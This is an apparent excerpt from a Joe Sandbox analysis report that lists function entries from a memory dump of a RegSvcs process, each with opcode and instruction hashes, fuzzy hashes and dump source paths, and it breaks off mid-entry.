                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 632f541a676d07ef554b975deb783a3319a2f429a522b9747ef40a2f3eaede24
                                            • Instruction ID: 672db25ae1c1f0a3cd6893c71aab86e714db3f754a3203897b0cfdbda854203d
                                            • Opcode Fuzzy Hash: 632f541a676d07ef554b975deb783a3319a2f429a522b9747ef40a2f3eaede24
                                            • Instruction Fuzzy Hash: 3141D3716107059FE325CF28C890A22B7FAFF49318B144A6DE547C7A51E730FA45CB94
                                            Function 0188A470 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca4b2253f2639b9f590256d1b4025237adb80da0de32a11c6c8f0ae1e7cbed9d
                                            • Instruction ID: 0cf1deacc1239fa6bc1d958da98495c6d56a2bb66b6cf7f0213bda1453ed7b14
                                            • Opcode Fuzzy Hash: ca4b2253f2639b9f590256d1b4025237adb80da0de32a11c6c8f0ae1e7cbed9d
                                            • Instruction Fuzzy Hash: DD41BE31944609CFDB29EFACD4947A97BB0FB54714F04015AE911FB2D5EB34DA80CBA1
                                            Function 01868BF0 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 700feb00c08f77d91731b8da26045c4b1f43e8652e7840310561e451f4d21aad
                                            • Instruction ID: e3fcd2cb5f5fb4af329a94d3b5fc7d8a6acfc73259aed8c30b2ffab0ecc47fdc
                                            • Opcode Fuzzy Hash: 700feb00c08f77d91731b8da26045c4b1f43e8652e7840310561e451f4d21aad
                                            • Instruction Fuzzy Hash: 63412532904306CBD764DF5CD880A5ABBBAFF95704F14812ED905EB259D735DA82CFA0
                                            Function 01858918 Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98761bd6215d216e074df3497ab9131ec32b1904a873083ac5689690b9d861a1
                                            • Instruction ID: a215ec62ee63747c9e007fe61e62ad2937e2caba82a5663c722b771629c96bfc
                                            • Opcode Fuzzy Hash: 98761bd6215d216e074df3497ab9131ec32b1904a873083ac5689690b9d861a1
                                            • Instruction Fuzzy Hash: E64129325083069FE312DF698880A6BB7E9EF85B54F40092BF984D7251E730DF058B97
                                            Function 0185A020 Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction ID: 81b59f3ff40093a2763dc19b819c60a29dc69b941d4ceb76aaa696bc390f270f
                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction Fuzzy Hash: 3B413731A00616EBDB29DE6D84D07FABBA1EB90764F15816AED45DB340D632CF80CB91
                                            Function 018609AD Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0ece3526c279a2b3a7a2b9281b6433934baffbcfce70d77aa64df38fffac78f
                                            • Instruction ID: 318d24e0a75d2ad8b9ca1276047f5aaa6b306413689c29939e4bda7b004b295f
                                            • Opcode Fuzzy Hash: b0ece3526c279a2b3a7a2b9281b6433934baffbcfce70d77aa64df38fffac78f
                                            • Instruction Fuzzy Hash: 16419971640701EFD321CF18C880B6ABBF9FF58355F208A2AE449CB251E770EA42CB95
                                            Function 01890710 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction ID: a626d19585224718b5815696193297114574afc5ac630ec3a0d3519bff959f74
                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction Fuzzy Hash: 0D410871A00609EFDB24CF98C980AAABBF9FF18714B14496DE556EB651D330EA44CF90
                                            Function 0186262C Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc74eabe6a1970af07dca323e63d88e31f132a266266b5248c0264b1c78242b5
                                            • Instruction ID: d269dc9e2dba6df4a3cc2daf357e3577a687641d8d1c10843723a8576c7cb8fd
                                            • Opcode Fuzzy Hash: dc74eabe6a1970af07dca323e63d88e31f132a266266b5248c0264b1c78242b5
                                            • Instruction Fuzzy Hash: EF417F71501705CFCB22EF28D940B69B7FAFF94314F1482A9C516EB6A1EB349A41CB52
                                            Function 0189C8F9 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e4a66e633063d700454cf6893391ffe613bbdf309cdd6efe5b21e138979eb2a
                                            • Instruction ID: 4ec6a4b3e95ed156d800bb4a8521556de983797e879d51bd6c33afbf425878de
                                            • Opcode Fuzzy Hash: 6e4a66e633063d700454cf6893391ffe613bbdf309cdd6efe5b21e138979eb2a
                                            • Instruction Fuzzy Hash: 43318AB2A00745DFDB11CFA8C440B99BBF0FB49714F2485AED119EB251D3369A02CF90
                                            Function 018E07C3 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1c886bee536967aacb9690c1e2d134d5a8ac0545abab58da9b0ecd989afd596
                                            • Instruction ID: 77395e9b8adae3c76a9ce6894c150691f39fa9da7c2aac9976992d42ad9cf296
                                            • Opcode Fuzzy Hash: d1c886bee536967aacb9690c1e2d134d5a8ac0545abab58da9b0ecd989afd596
                                            • Instruction Fuzzy Hash: 37418C72608315ABD720DF29C845B9BFBE8FF88764F004A2EF598D7251D7709A04CB92
                                            Function 018580A0 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ffbb677edb7834421da6322bb4f3c5f8f5661abf2c0d75e04e2cf7aa789ae01
                                            • Instruction ID: 3379c6d12118d498646e4e705dae39490cb77e747d3ca1f021322c6c6a940d0f
                                            • Opcode Fuzzy Hash: 6ffbb677edb7834421da6322bb4f3c5f8f5661abf2c0d75e04e2cf7aa789ae01
                                            • Instruction Fuzzy Hash: 7F41F471A45A1ADFDB41DF1AC8806A8BBB5FF45764F10822ADC16E7280DB30EE418BD0
                                            Function 018E05A7 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f16cc2c58b24395ed5cf5f057ef2e60f094d8b57c1533ec4409954c0543fe1ec
                                            • Instruction ID: 350da8b4db186ca3b3d6e48924a3e2d4d45c77df39254ced19a00023d6ed8d1f
                                            • Opcode Fuzzy Hash: f16cc2c58b24395ed5cf5f057ef2e60f094d8b57c1533ec4409954c0543fe1ec
                                            • Instruction Fuzzy Hash: 4741D2726087469FD320DF6CC844B6AB7E5BFC9700F140A19F955D7690E770EA04CBA6
                                            Function 01864859 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8be448aac0600ffe3b919ebe55cf16826803bce58275e9fb6a45b61f1d59a64b
                                            • Instruction ID: 48fc78ff56ab27e410f519ddb9c30b8f06b3bb4c126785aecd5a284ea22cc89c
                                            • Opcode Fuzzy Hash: 8be448aac0600ffe3b919ebe55cf16826803bce58275e9fb6a45b61f1d59a64b
                                            • Instruction Fuzzy Hash: 6A41B3702443028BD725DF2CD894B2ABBEEFF80754F14442DEA45CB2A1DB30DA41CB52
                                            Function 01858B50 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 927bbae087c2728324623a2b2c63f6ecf3401654b158c0a14b469273b3a6c9b2
                                            • Instruction ID: 3a68f113be5ae68bb3777002d84ffbe353220d32f872f232dbaa31c846097916
                                            • Opcode Fuzzy Hash: 927bbae087c2728324623a2b2c63f6ecf3401654b158c0a14b469273b3a6c9b2
                                            • Instruction Fuzzy Hash: 01418071A01609CFCB95CF6EC98099DBBF1FF89364B10862AD866E7260DB349A41CB41
                                            Function 018702E1 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction ID: e236cd306dc9a6ac7577a11011be2c37eb3a2d74a3490239e9ce40830ac32165
                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction Fuzzy Hash: 13312831A00248AFDB21CB6CCC80B9BBFE9EF15754F0441A6F815D7352D674DA84CBA1
                                            Function 0190E3DB Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58b1f850cb0acf924412d90de3a1f3ecf136761d853aa823c037627c35cad337
                                            • Instruction ID: fab5daab602a721752a256a069633a88ac835619f96ab442a8da2519ea669b26
                                            • Opcode Fuzzy Hash: 58b1f850cb0acf924412d90de3a1f3ecf136761d853aa823c037627c35cad337
                                            • Instruction Fuzzy Hash: C8319635740706ABD722EF698C41F6B76A9AB59F50F010428F604EB3D1DAA4DD0097A1
                                            Function 01914B4B Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af8e57b4f75c13cafd8bda1f6ee967430ff5dcbcead48801e50cc32e8b397f52
                                            • Instruction ID: 86a4c3f48a873cf5b2dcf66cb005ea7237100f45c39360d8276b5135d2583271
                                            • Opcode Fuzzy Hash: af8e57b4f75c13cafd8bda1f6ee967430ff5dcbcead48801e50cc32e8b397f52
                                            • Instruction Fuzzy Hash: 4531E6326093058FC321DF1DD880E6AB7FAFB88360F59446DE9599B259D730E880CF91
                                            Function 01864260 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d76f61eca944709ad68fa090d2f5a1751ee3accf3939b4d46fd88fdd1e369b1
                                            • Instruction ID: 2d4503443b1cbc91ef3599e4352e9a6e72844ee669f296076fa70bce1957a05c
                                            • Opcode Fuzzy Hash: 0d76f61eca944709ad68fa090d2f5a1751ee3accf3939b4d46fd88fdd1e369b1
                                            • Instruction Fuzzy Hash: B741BF35200B45DFD722CF68C980FDABBEAAF44B54F15442DE65ACB250D774EA04CBA0
                                            Function 01914BB0 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2406d8c06652d06d137b2ec527912a9f6852d309f975a34e1d39853af1056e0
                                            • Instruction ID: 9b4cb69a5e3139fb9722e1ddfa69179e796a7adb075e3f3e29f81250f2d6e1d4
                                            • Opcode Fuzzy Hash: d2406d8c06652d06d137b2ec527912a9f6852d309f975a34e1d39853af1056e0
                                            • Instruction Fuzzy Hash: CE317E71A043068FD720DF28C880E6AB7E5FBC8710F05496DF9599B359E730E985CB92
                                            Function 018DEB1D Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e3dfbd2033dac9b26282e359cf65b1d0d1ac9d52afd1c0bae493c7a8db0ed5f
                                            • Instruction ID: 2ec2485579ec61663a8cb6fc039a838c51069c948517bd09a8c4567aef74f7af
                                            • Opcode Fuzzy Hash: 8e3dfbd2033dac9b26282e359cf65b1d0d1ac9d52afd1c0bae493c7a8db0ed5f
                                            • Instruction Fuzzy Hash: F831A1317017869BF326975CCD48B657BD8BB41B44F1D04A4AF85EF6D2DB68EA80C322
                                            Function 019261C3 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 864170faf458199a7bfe1977859b80f60153169b30ef865cf36f4eec3c0885e6
                                            • Instruction ID: 1e74ed917f079172547fb336a6614b9c25b047b7c8eae630710514e7724ab0e9
                                            • Opcode Fuzzy Hash: 864170faf458199a7bfe1977859b80f60153169b30ef865cf36f4eec3c0885e6
                                            • Instruction Fuzzy Hash: 5B31D576A0026AEBDB15DF98CC40FAEB7B9FB45B40F554168E904EB248D770ED00CBA4
                                            Function 0190483A Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 098d978d12ab3768b0b85bcebf3395153e9d5c1feae32bb4c3d0aabd2bb8f2b3
                                            • Instruction ID: 18b54e3e4651b5db006ef9cfc76ac8ad67ef04954328ff1c8c9590dc7159b7c1
                                            • Opcode Fuzzy Hash: 098d978d12ab3768b0b85bcebf3395153e9d5c1feae32bb4c3d0aabd2bb8f2b3
                                            • Instruction Fuzzy Hash: 96315576A4012DAFCF22DF58DD44BDE7BB9AB98750F1400A5A60CE7250DA30DE918F91
                                            Function 0188EB20 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c5ae6f3206efb5927b9c56e6b7404bbb47db0b9ea6ec6750a74cd2eb990a9cd
                                            • Instruction ID: 1a7451a684813c2ef7beb770fea89f53fd808db6834bcc53d8799ad1edeadc33
                                            • Opcode Fuzzy Hash: 9c5ae6f3206efb5927b9c56e6b7404bbb47db0b9ea6ec6750a74cd2eb990a9cd
                                            • Instruction Fuzzy Hash: 44319372E01219AFDB21EFADCC40AAEBBF9EF44750F114465EA16E7250D670DF008BA1
                                            Function 019260B8 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abc576706f666771561fd938f5e5bd533085af67490b6790078866b16f2d6326
                                            • Instruction ID: e36d83e3d5f2573f1de9a30beebf1f82ba029b24a6aa27593517eb66e7526e10
                                            • Opcode Fuzzy Hash: abc576706f666771561fd938f5e5bd533085af67490b6790078866b16f2d6326
                                            • Instruction Fuzzy Hash: C031D671A40626AFD712DF9DC850B6EB7B9FF84754F200069E909EB756DA30ED008B90
                                            Function 018607AF Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 371aabf41009b1dbf8bc6aa5b889a6b699486d24ced2af22269098477418cf57
                                            • Instruction ID: 55b503e2b48d81e3b2538fa315e63bc2eee661639ce18bc0c296df419d17d337
                                            • Opcode Fuzzy Hash: 371aabf41009b1dbf8bc6aa5b889a6b699486d24ced2af22269098477418cf57
                                            • Instruction Fuzzy Hash: CD31B132A04716DBC713DE288C80AABBBA9EFD4750F014529FD55EB311DA30DE0197E6
                                            Function 01868550 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1bf94377f52d5239b60213fd34977697b6009c8d5bd5f895abba34957d5eb79
                                            • Instruction ID: 2de4c9cf01c77abddf9efe244decfb2dea9ab614b694f185f1454a7b091b7c23
                                            • Opcode Fuzzy Hash: a1bf94377f52d5239b60213fd34977697b6009c8d5bd5f895abba34957d5eb79
                                            • Instruction Fuzzy Hash: D7317C716093018FE720CF19C844B2ABBEAFB98B10F05496EF989D7391D770EA44CB91
                                            Function 0189A6C7 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction ID: 21cd5dfd1644074a5666afa8590ad38cf07af09621c283ba330fe49377a7b44a
                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction Fuzzy Hash: DF310E72B00705AFDB65CF6DDD41B57BBF8AB08B50F18492DA59AC3651E630EA00CB60
                                            Function 0190EBD0 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 558a4f31ea69031c918438446bdba80d77dfbb6437ebaa4c40d3e0ee61725ec8
                                            • Instruction ID: c366ab05997cddcb9df6a39d1ee69a1ff98f9e7ae765668de59f91b0b32fe5cb
                                            • Opcode Fuzzy Hash: 558a4f31ea69031c918438446bdba80d77dfbb6437ebaa4c40d3e0ee61725ec8
                                            • Instruction Fuzzy Hash: 0B319AB1A09311CFC712DF19C54095ABBF6FF89315F4449AEE88CAB291D332DA44CB92
                                            Function 0188438F Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b31aae3c8da690d4d98791a7f3c5047a8af65f25f3a58de50e339461d36efb58
                                            • Instruction ID: ebfccaf79a259203f956ecf27979b1b111e39b1a6fa6dc6908e1ee582a551e5e
                                            • Opcode Fuzzy Hash: b31aae3c8da690d4d98791a7f3c5047a8af65f25f3a58de50e339461d36efb58
                                            • Instruction Fuzzy Hash: 2E31F172B016069FD720EFBCC881B6EBBF9AB80704F10842AD106D3255E730EB45CB91
                                            Function 0185CB7E Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction ID: efe0112b807a058bfc0c9a889b001b7b149af27796179c00716e804648de2781
                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction Fuzzy Hash: 5821F236E0165AAADB109BB98840BEFBBB9EF54740F0580359E55EB340E370DE008BA1
                                            Function 0185C156 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b593b52807411cb9a506e69227febaf80c567cba728cb1b4dea4b1c3e45006ef
                                            • Instruction ID: 0d44c6552b497af5a75ed408c089b42321d8ca1add510b1159c66ef7d061aa36
                                            • Opcode Fuzzy Hash: b593b52807411cb9a506e69227febaf80c567cba728cb1b4dea4b1c3e45006ef
                                            • Instruction Fuzzy Hash: 2E3129725003019BD721AF6CCC80BE977B4EF91318F9482A9DD45DB342DA34DA86CB95
                                            Function 0191C3CD Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction ID: d2327ef13a563a7c11cdba7b5e4f1c6877ebfa28bd4af877abb2b6450565ff11
                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction Fuzzy Hash: B121453664065A77DF159B998C00FBBFB75EF80B11F40801AFA59C76D1D634DA81C361
                                            Function 0185E420 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9229d787f53d6bec34fe9a39bf08f5fd00a16ec20bce63f63dd5cd3611462bfd
                                            • Instruction ID: c2e439c17f325baaea75b87b9640df3a0f99fc825b80135fcc54aa952f2cba72
                                            • Opcode Fuzzy Hash: 9229d787f53d6bec34fe9a39bf08f5fd00a16ec20bce63f63dd5cd3611462bfd
                                            • Instruction Fuzzy Hash: 3D31B632A0152C9BEB31DF18CC81FEEBBB9EB15744F4101A1EA45E7290D6749F809F91
                                            Function 01894588 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
